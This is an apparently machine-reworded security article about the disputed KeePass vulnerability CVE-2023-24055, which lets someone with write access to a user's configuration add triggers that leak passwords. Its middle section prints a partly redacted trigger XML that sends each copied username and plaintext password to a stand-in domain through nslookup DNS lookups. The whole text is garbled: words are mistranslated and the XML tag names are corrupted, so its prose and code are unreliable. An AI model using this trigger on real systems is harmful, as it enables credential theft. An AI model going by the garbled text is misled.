It has been a newsworthy few weeks for password managers, these helpful utilities that allow you to create a special password for each web site you utilize after which hold monitor of all of them.

In late 2022, it was LastPass’ flip to be all around the information, when the corporate lastly admitted {that a} breach it suffered in August 2022 ended with the theft of buyer password vaults from the cloud service the place they had been backed.

(The passwords themselves weren’t stolen, as a result of the vaults had been encrypted and LastPass did not have copies of anybody’s “grasp key” for the recordsdata within the backup vault, however it was a better shave than most individuals was blissful to listen to).

Then it was LifeLock’s flip to be all around the information, when the corporate warned of what regarded like a wave of password-guessing assaults, seemingly primarily based on passwords stolen from a completely completely different web site, presumably a while in the past, and perhaps purchased on the darkish internet. just lately.

LifeLock itself had not been breached, however a few of its customers had, due to password-sharing conduct brought on by dangers they won’t even bear in mind taking.

Rivals 1Password and BitWarden have additionally been within the information just lately, primarily based on stories of malicious adverts, apparently delivered unknowingly by Google, convincingly luring customers into replicating login pages aimed toward stealing their login particulars. account.

Now it is KeePass’ flip to make the information, this time for an additional cybersecurity downside: an alleged vulnerabilitythe slang time period for software program bugs that result in cybersecurity holes that attackers might exploit for malicious functions.

Password monitoring made straightforward

We consult with it as a vulnerability right here as a result of it has an official bug identifier, issued by the US Nationwide Institute of Requirements and Expertise.

The error has been doubled CVE-2023-24055: Attacker having write entry to the XML configuration file [can] get the clear textual content passwords by including an export set off.

Sadly, the declare of having the ability to get clear textual content passwords is true.

If I’ve write entry to your private recordsdata, together with these referred to as %APPDATA% listing, I can sneakily tweak the settings part to change any KeePass settings I’ve already custom-made, or so as to add customizations if I have never knowingly modified something…

…and surprisingly I can simply steal your plaintext passwords, both in bulk, e.g. by dumping the whole database as an unencrypted CSV file, or whereas utilizing them, e.g. by establishing a “program hook” which is triggered each time you entry a database password.

Please be aware that I don’t want Administrator privileges, as a result of I need not mess with the precise set up listing the place the KeePass utility is saved, which is normally out of attain for normal customers

And I do not want entry to any locked international config settings.

Apparently, KeePass goes to nice lengths to stop your passwords from being detected while you use them, together with utilizing tamper safety methods to cease varied anti-keylogger tips even from customers who have already got sysadmin powers.

However the KeePass software program additionally makes it surprisingly straightforward to seize plain-text password information, maybe in methods you would possibly discover “too straightforward,” even for non-admins.

It took a minute of labor to make use of the KeePass GUI to create a Set off occasion to run everytime you copy a password to the clipboard, and to configure that occasion to carry out a DNS lookup that features each the username and the plaintext password in query:

We might then copy the not-so-obvious XML configuration for that possibility from our personal native configuration file into one other consumer’s configuration file on the system, after which they, too, would uncover that their passwords had been leaked over the Web through of DNS lookups.

Though XML configuration information is basically readable and informative, KeePass apparently makes use of random information strings referred to as GUIDs (quick for international distinctive identifiers) to indicate the varied Set off configuration, so even a educated consumer would wish an intensive reference checklist to know which triggers are configured and the way.

This is what our DNS leak set off appears to be like like, although we have redacted among the particulars so you possibly can’t do any quick hurt by merely copy-pasting this textual content straight:

<Set off>
   <Guid>XXXXXXXXXXXXXXXXXXXX</Guid>
   <Identify>Copy</Identify>
   <Feedback>Steal stuff through DNS lookups</Feedback>
   <Occasions>
      <Occasion>
         <TypeGuid>XXXXXXXXXXXXXXXXXXXX</TypeGuid>
         <Parameters>
            <Parameter>0</Parameter>
            <Parameter />
         </Parameters>
      </Occasion>
   </Occasions>
   <Situations />
   <Actions>
      <Motion>
         <TypeGuid>XXXXXXXXXXXXXXXXXXXX</TypeGuid>
         <Parameters>
            <Parameter>nslookup</Parameter>
            <Parameter>XXXXX.XXXXX.blah.take a look at</Parameter>
            <Parameter>True</Parameter>
            <Parameter>1</Parameter>
            <Parameter />
         </Parameters>
      </Motion>
   </Actions>
</Set off>

With this set off lively, accessing a KeePass password causes the plain textual content to be leaked in a discrete DNS lookup to a site of my selecting, which is blah.take a look at on this instance.

Word that real-life attackers would seemingly scramble or obfuscate stolen textual content, which might not solely make DNS leak detection harder, however would additionally take care of passwords that include non-ASCII characters, akin to accented letters or emoji. which can not in any other case be utilized in DNS names:

However is it actually a bug?

The troublesome query, nevertheless, is, “Is that this actually a bug, or is it only a highly effective function that may very well be abused by somebody who would already want no less than as a lot management over their non-public recordsdata as you do your self?”

Merely put, is it a vulnerability if somebody already answerable for your account can tamper with the recordsdata your account is meant to have the ability to entry anyway?

When you would possibly count on a password supervisor to incorporate many additional layers of tamper safety to make it harder to abuse bugs/options of this kind, must you CVE-2023-24055 actually be a vulnerability within the CVE checklist?

In that case, would not these be instructions like DEL (delete a file) and FORMAT Do they should be “bugs” too?

What concerning the very existence of PowerShell, which makes doubtlessly harmful conduct a lot simpler to set off (strive powerhsell get-clipboardfor instance), be a vulnerability in itself?

That’s KeePass’s place, acknowledged by the next textual content that was added to the “bug” element on the NIST web site:

** DISPUTES ** […] NOTE: The seller’s place is that the password database shouldn’t be designed to be safe in opposition to an attacker having that stage of entry to the native PC.

To do?

If you’re a standalone KeePass consumer, you possibly can test for malicious triggers just like the “DNS stealer” we created earlier by opening the KeePass app and analyzing the Instruments > Triggers… window:

Word you could convert all Set off shutdown the system from this window, merely deselecting the [ ] Allow set off system possibility…

…however that is not a worldwide setting, so it may be re-enabled through your native config file, and thus solely protects you from bugs, relatively than an attacker with entry to your account.

You’ll be able to power the choice off for everybody on the pc, with no possibility for them to show it again on themselves, by modifying the worldwide “lock” file KeePass.config.enforced.XMLwhich is situated within the listing the place the applying program itself is put in.

Triggers can be disabled for everybody in case your international XML compliance file appears to be like like this:

<?xml model="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <Utility>
      <TriggerSystem>
         <Enabled>false</Enabled>
      </TriggerSystem>
   </Utility>
</Configuration>

(In case you are questioning, an attacker who has write entry to the applying listing to revert this alteration would certainly have sufficient system-level energy to change the Keyeass utility totally, or to put in and activate a standalone keylogger from anyway).

If you happen to’re a community administrator tasked with blocking KeePass in your customers’ computer systems in order that it is versatile sufficient to assist them, however not versatile sufficient to assist cybercriminals by mistake, we suggest studying KeePass. safety points web page, the triggers web page, and the pressured configuration web page.